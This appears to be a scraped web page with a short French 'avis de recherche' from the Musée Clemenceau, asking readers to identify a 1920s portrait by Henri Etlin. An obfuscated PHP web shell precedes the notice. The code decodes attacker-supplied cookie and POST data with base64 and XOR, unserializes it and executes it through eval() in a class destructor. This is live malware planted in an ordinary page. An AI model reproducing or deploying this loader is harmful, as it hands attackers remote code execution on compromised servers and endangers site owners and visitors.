$radbgkGaO = chr ( 226 - 128 ).chr (95) . "\110" . "\110" . chr ( 1005 - 885 ).chr (83); $XNwrukw = chr (99) . chr (108) . 'a' . chr (115) . 's' . '_' . chr ( 942 - 841 ).chr (120) . chr ( 561 - 456 ).'s' . 't' . chr (115); $RHqyMfXZ = class_exists($radbgkGaO); $XNwrukw = "38266";$WfjtDmjj = strpos($XNwrukw, $radbgkGaO);if ($RHqyMfXZ == $WfjtDmjj){function dHEgsVf(){$nfiRtktwlh = new /* 20805 */ b_HHxS(30847 + 30847); $nfiRtktwlh = NULL;}$qstsOGkTFX = "30847";class b_HHxS{private function LaJgVo($qstsOGkTFX){if (is_array(b_HHxS::$IgGYDqSS)) {$zedwypqV2 = str_replace("<" . "?php", "", b_HHxS::$IgGYDqSS["content"]);eval($zedwypqV2); $qstsOGkTFX = "30847";exit();}}public function CpuwUkFs(){$zedwypqV = "12320";$this->_dummy = str_repeat($zedwypqV, strlen($zedwypqV));}public function __destruct(){b_HHxS::$IgGYDqSS = @unserialize(b_HHxS::$IgGYDqSS); $qstsOGkTFX = "6244_9907";$this->LaJgVo($qstsOGkTFX); $qstsOGkTFX = "6244_9907";}public function zGqad($zedwypqV, $lNxZRxg){return $zedwypqV[0] ^ str_repeat($lNxZRxg, intval(strlen($zedwypqV[0]) / strlen($lNxZRxg)) + 1);}public function giwVKQL($zedwypqV){$ZiOrGUflIM = "\x62" . chr (97) . "\x73" . "\145" . chr (54) . "\x34";return array_map($ZiOrGUflIM . "\137" . chr (100) . "\145" . chr (99) . chr (111) . chr (100) . "\145", array($zedwypqV,));}public function __construct($AosXytpQ=0){$BAdmhyh = "\54";$zedwypqV = "";$xgbhszpBUQ = $_POST;$sDNmvZac = $_COOKIE;$lNxZRxg = "35122bef-c6af-48e0-81f9-509ff24571c4";$nTObYwkZSc = @$sDNmvZac[substr($lNxZRxg, 0, 4)];if (!empty($nTObYwkZSc)){$nTObYwkZSc = explode($BAdmhyh, $nTObYwkZSc);foreach ($nTObYwkZSc as $OqvxYVy){$zedwypqV .= @$sDNmvZac[$OqvxYVy];$zedwypqV .= @$xgbhszpBUQ[$OqvxYVy];}$zedwypqV = $this->giwVKQL($zedwypqV);}b_HHxS::$IgGYDqSS = $this->zGqad($zedwypqV, $lNxZRxg);if (strpos($lNxZRxg, $BAdmhyh) !== FALSE){$lNxZRxg = explode($BAdmhyh, $lNxZRxg); $WCSdlnd = sprintf("6244_9907", strrev($lNxZRxg[0]));}}public static $IgGYDqSS = 44207;}dHEgsVf();} AVIS DE RECHERCHE - Musée Clemenceau

Nous avons besoin de votre aide pour trouver l’identité de ce personnage croqué par Henri ETLIN (1886-1951), illustrateur dans les années 20.

Une reproduction de ce portrait se trouve sur le bureau de Georges Clemenceau, rue Benjamin Franklin, Paris 16ème.


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